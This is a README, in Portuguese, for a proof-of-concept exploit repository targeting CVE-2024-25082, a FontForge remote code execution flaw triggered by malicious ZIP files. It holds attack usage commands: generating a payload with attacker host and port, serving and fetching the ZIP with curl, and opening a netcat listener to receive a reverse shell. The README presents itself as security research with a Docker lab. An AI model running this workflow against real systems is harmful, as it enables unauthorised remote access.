
Exploit de prova de conceito para CVE-2024-25082, demonstrando execução remota de código no FontForge através de arquivos ZIP maliciosos. Inclui gerador de payload, laboratório Docker e documento técnico para pesquisa e educação em segurança.
Exploit de Prova de Conceito para CVE-2024-25082, uma vulnerabilidade que afeta o FontForge e permite Execução Remota de Código (RCE) através de um arquivo ZIP malicioso.
Este repositório demonstra como a vulnerabilidade pode ser explorada em um ambiente de laboratório controlado para fins de pesquisa em segurança e educação.
A vulnerabilidade ocorre devido à validação inadequada de arquivos dentro de arquivos ZIP, permitindo que um invasor execute comandos arbitrários no sistema alvo.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
Arquivo Descrição
exploit.py Gera o payload ZIP malicioso poc/ Contém arquivos de prova de conceito gerados writeup.md Explicação técnica da vulnerabilidade
Instalar ferramentas opcionais:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
Isso gerará um arquivo exploit.zip malicioso.
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
Se bem-sucedido, um shell deve ser obtido a partir do sistema alvo.
Um ambiente vulnerável reproduzível é fornecido dentro do diretório docker/.
Exemplo:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
Isso permite testes seguros sem afetar sistemas de produção.
Um invasor capaz de fazer upload ou controlar arquivos ZIP processados pela aplicação vulnerável pode:
Passos de mitigação recomendados:
Este repositório contém código de Prova de Conceito para uma vulnerabilidade divulgada publicamente.
O código é fornecido estritamente para:
NÃO use este código contra sistemas sem permissão explícita.
O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por este software.
Moamen Elmaghrabi
Estudante de Cibersegurança
Testes de Penetração e Desenvolvimento de Exploits
Este projeto está licenciado sob a Licença MIT.
Veja o arquivo LICENSE para detalhes.